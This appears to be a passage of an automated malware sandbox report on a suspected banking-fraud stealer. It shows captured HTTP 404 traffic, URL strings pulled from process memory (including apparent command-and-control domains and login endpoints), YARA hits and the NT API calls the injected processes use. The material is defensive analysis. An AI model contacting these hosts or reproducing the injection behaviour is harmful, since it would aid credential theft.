30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Sat, 11 Jan 2025 04:10:36 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 
30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Sat, 11 Jan 2025 04:10:43 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Sat, 11 Jan 2025 04:10:46 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Sat, 11 Jan 2025 04:10:48 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Sat, 11 Jan 2025 04:10:51 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 11 Jan 2025 04:10:57 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66a5f968-94" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 11 Jan 2025 04:10:59 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66a5f968-94" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 11 Jan 2025 04:11:02 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66a5f968-94" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 11 Jan 2025 04:11:04 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66a5f968-94" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | x-powered-by: PHP/8.1.29 | cache-control: no-cache, private | content-type: text/html; charset=UTF-8 | content-length: 1992 | content-encoding: br | vary: Accept-Encoding | date: Sat, 11 Jan 2025 04:11:10 GMT
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | x-powered-by: PHP/8.1.29 | cache-control: no-cache, private | content-type: text/html; charset=UTF-8 | content-length: 1992 | content-encoding: br | vary: Accept-Encoding | date: Sat, 11 Jan 2025 04:11:13 GMT
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | x-powered-by: PHP/8.1.29 | cache-control: no-cache, private | content-type: text/html; charset=UTF-8 | content-length: 1992 | content-encoding: br | vary: Accept-Encoding | date: Sat, 11 Jan 2025 04:11:16 GMT
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | x-powered-by: PHP/8.1.29 | cache-control: no-cache, private | content-type: text/html; charset=UTF-8 | content-length: 6603 | date: Sat, 11 Jan 2025 04:11:18 GMT
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 11 Jan 2025 04:12:04 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 11 Jan 2025 04:12:07 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 11 Jan 2025 04:12:10 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 11 Jan 2025 04:12:12 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: ZcshRk2lgh.exe String found in binary or memory: http://tempuri.org/kviskotekaDbDataSet.xsdcIgra
                Source: EbjRcLZjak.exe, 0000000E.00000002.3098541538.00000000053E2000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.whisperart.net
                Source: EbjRcLZjak.exe, 0000000E.00000002.3098541538.00000000053E2000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.whisperart.net/rfcw/
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007C48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007C48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007C48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007C48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007C48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007C48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007C48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: regini.exe, 0000000D.00000002.3097407112.000000000462E000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 0000000D.00000002.3099305756.0000000006200000.00000004.00000800.00020000.00000000.sdmp, EbjRcLZjak.exe, 0000000E.00000002.3096520565.0000000003B1E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: regini.exe, 0000000D.00000002.3092940507.0000000002EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: regini.exe, 0000000D.00000002.3092940507.0000000002EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: regini.exe, 0000000D.00000002.3092940507.0000000002EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: regini.exe, 0000000D.00000002.3092940507.0000000002EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: regini.exe, 0000000D.00000002.3092940507.0000000002EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033u
                Source: regini.exe, 0000000D.00000002.3092940507.0000000002EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: regini.exe, 0000000D.00000002.3092940507.0000000002EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: regini.exe, 0000000D.00000003.1824115593.0000000007C20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: regini.exe, 0000000D.00000002.3097407112.0000000004952000.00000004.10000000.00040000.00000000.sdmp, EbjRcLZjak.exe, 0000000E.00000002.3096520565.0000000003E42000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.cssa.auction/rjvg/?-Jkp4f=tUIUitDW424aYZRkIy55Xux7Uvf
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007C48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/

                E-Banking Fraud

                Source: Yara match File source: 11.2.ZcshRk2lgh.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 11.2.ZcshRk2lgh.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0000000E.00000002.3098541538.0000000005390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000D.00000002.3092740310.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000B.00000002.1633443827.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000D.00000002.3092558737.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000002.3095243481.0000000004DA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000B.00000002.1634959361.00000000036C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_0042C8D3 NtClose, 11_2_0042C8D3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2B60 NtClose,LdrInitializeThunk, 11_2_014E2B60
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2DF0 NtQuerySystemInformation,LdrInitializeThunk, 11_2_014E2DF0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2C70 NtFreeVirtualMemory,LdrInitializeThunk, 11_2_014E2C70
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E35C0 NtCreateMutant,LdrInitializeThunk, 11_2_014E35C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E4340 NtSetContextThread, 11_2_014E4340
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E4650 NtSuspendThread, 11_2_014E4650
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2BE0 NtQueryValueKey, 11_2_014E2BE0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2BF0 NtAllocateVirtualMemory, 11_2_014E2BF0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2B80 NtQueryInformationFile, 11_2_014E2B80
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2BA0 NtEnumerateValueKey, 11_2_014E2BA0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2AD0 NtReadFile, 11_2_014E2AD0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2AF0 NtWriteFile, 11_2_014E2AF0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2AB0 NtWaitForSingleObject, 11_2_014E2AB0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2D00 NtSetInformationFile, 11_2_014E2D00
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2D10 NtMapViewOfSection, 11_2_014E2D10
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2D30 NtUnmapViewOfSection, 11_2_014E2D30
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2DD0 NtDelayExecution, 11_2_014E2DD0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2DB0 NtEnumerateKey, 11_2_014E2DB0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2C60 NtCreateKey, 11_2_014E2C60
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2C00 NtQueryInformationProcess, 11_2_014E2C00
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2CC0 NtQueryVirtualMemory, 11_2_014E2CC0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2CF0 NtOpenProcess, 11_2_014E2CF0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2CA0 NtQueryInformationToken, 11_2_014E2CA0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2F60 NtCreateProcessEx, 11_2_014E2F60
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2F30 NtCreateSection, 11_2_014E2F30
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2FE0 NtCreateFile, 11_2_014E2FE0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2F90 NtProtectVirtualMemory, 11_2_014E2F90
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2FA0 NtQuerySection, 11_2_014E2FA0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2FB0 NtResumeThread, 11_2_014E2FB0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2E30 NtWriteVirtualMemory, 11_2_014E2E30
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2EE0 NtQueueApcThread, 11_2_014E2EE0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2E80 NtReadVirtualMemory, 11_2_014E2E80
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E2EA0 NtAdjustPrivilegesToken, 11_2_014E2EA0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E3010 NtOpenDirectoryObject, 11_2_014E3010
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E3090 NtSetValueKey, 11_2_014E3090
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E39B0 NtGetContextThread, 11_2_014E39B0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E3D70 NtOpenThread, 11_2_014E3D70
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E3D10 NtOpenProcessToken, 11_2_014E3D10
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B4340 NtSetContextThread,LdrInitializeThunk, 13_2_034B4340
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B4650 NtSuspendThread,LdrInitializeThunk, 13_2_034B4650
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2B60 NtClose,LdrInitializeThunk, 13_2_034B2B60
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2BE0 NtQueryValueKey,LdrInitializeThunk, 13_2_034B2BE0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 13_2_034B2BF0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2BA0 NtEnumerateValueKey,LdrInitializeThunk, 13_2_034B2BA0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2AD0 NtReadFile,LdrInitializeThunk, 13_2_034B2AD0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2AF0 NtWriteFile,LdrInitializeThunk, 13_2_034B2AF0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2F30 NtCreateSection,LdrInitializeThunk, 13_2_034B2F30
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2FE0 NtCreateFile,LdrInitializeThunk, 13_2_034B2FE0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2FB0 NtResumeThread,LdrInitializeThunk, 13_2_034B2FB0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2EE0 NtQueueApcThread,LdrInitializeThunk, 13_2_034B2EE0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2E80 NtReadVirtualMemory,LdrInitializeThunk, 13_2_034B2E80
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2D10 NtMapViewOfSection,LdrInitializeThunk, 13_2_034B2D10
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2D30 NtUnmapViewOfSection,LdrInitializeThunk, 13_2_034B2D30
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2DD0 NtDelayExecution,LdrInitializeThunk, 13_2_034B2DD0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2DF0 NtQuerySystemInformation,LdrInitializeThunk, 13_2_034B2DF0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2C60 NtCreateKey,LdrInitializeThunk, 13_2_034B2C60
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2C70 NtFreeVirtualMemory,LdrInitializeThunk, 13_2_034B2C70
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2CA0 NtQueryInformationToken,LdrInitializeThunk, 13_2_034B2CA0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B35C0 NtCreateMutant,LdrInitializeThunk, 13_2_034B35C0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B39B0 NtGetContextThread,LdrInitializeThunk, 13_2_034B39B0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2B80 NtQueryInformationFile, 13_2_034B2B80
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2AB0 NtWaitForSingleObject, 13_2_034B2AB0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2F60 NtCreateProcessEx, 13_2_034B2F60
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2F90 NtProtectVirtualMemory, 13_2_034B2F90
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2FA0 NtQuerySection, 13_2_034B2FA0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2E30 NtWriteVirtualMemory, 13_2_034B2E30
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2EA0 NtAdjustPrivilegesToken, 13_2_034B2EA0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2D00 NtSetInformationFile, 13_2_034B2D00
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2DB0 NtEnumerateKey, 13_2_034B2DB0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2C00 NtQueryInformationProcess, 13_2_034B2C00
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2CC0 NtQueryVirtualMemory, 13_2_034B2CC0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B2CF0 NtOpenProcess, 13_2_034B2CF0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B3010 NtOpenDirectoryObject, 13_2_034B3010
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B3090 NtSetValueKey, 13_2_034B3090
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B3D70 NtOpenThread, 13_2_034B3D70
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034B3D10 NtOpenProcessToken, 13_2_034B3D10
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_009393F0 NtCreateFile, 13_2_009393F0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_00939550 NtReadFile, 13_2_00939550
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_009396E0 NtClose, 13_2_009396E0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_00939640 NtDeleteFile, 13_2_00939640
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_00939850 NtAllocateVirtualMemory, 13_2_00939850
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_0327F149 NtReadVirtualMemory, 13_2_0327F149
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_0327F0E6 NtReadVirtualMemory, 13_2_0327F0E6
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_0327F795 NtClose, 13_2_0327F795
